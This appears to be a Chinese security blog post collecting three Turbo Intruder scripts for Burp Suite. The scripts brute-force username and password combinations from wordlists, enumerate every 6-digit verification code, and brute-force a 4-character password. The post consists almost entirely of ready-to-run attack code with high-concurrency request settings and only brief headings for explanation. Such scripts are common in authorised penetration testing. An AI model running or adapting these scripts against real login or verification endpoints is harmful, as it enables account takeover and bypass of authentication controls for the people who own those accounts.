turbo intruder常用脚本-XSS博客

爆破用户名密码

from urllib import quote
def user_password_brute(target, engine):
    for password in open("D:\\crypto\\mutou\\fuzzDicts\\passwordDict\\top500.txt"):
        for user in open("D:\\crypto\\mutou\\fuzzDicts\\userNameDict\\top500.txt"):
            engine.queue(target.req,[quote(user.rstrip()),quote(password.rstrip())])
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    #user_brute(target,engine)
    #password_brute(target,engine)
    user_password_brute(target,engine)
def handleResponse(req, interesting):
    table.add(req)
12345678910111213141516

爆破6位验证码

from itertools import product

def brute_veify_code(target, engine, length):
   pattern = '1234567890'
   for i in list(product(pattern, repeat=length)):
        code =  ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
   engine = RequestEngine(endpoint=target.endpoint,
           concurrentConnections=30,
           requestsPerConnection=100,
           pipeline=True
           )
   brute_veify_code(target, engine, 6)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
	table.add(req)
12345678910111213141516171819

爆破密码

from itertools import product

def brute_veify_code(target, engine, length):
   pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
   for i in list(product(pattern, repeat=length)):
        code =  ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
   engine = RequestEngine(endpoint=target.endpoint,
           concurrentConnections=30,
           requestsPerConnection=100,
           pipeline=True
           )
   brute_veify_code(target, engine, 4)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
    if 'password not match' not in req.response:
        table.add(req)

文章版权归作者所有，未经允许请勿转载。

THE END

网络安全

turbo intruder常用脚本

爆破用户名密码

爆破6位验证码

爆破密码

请登录后发表评论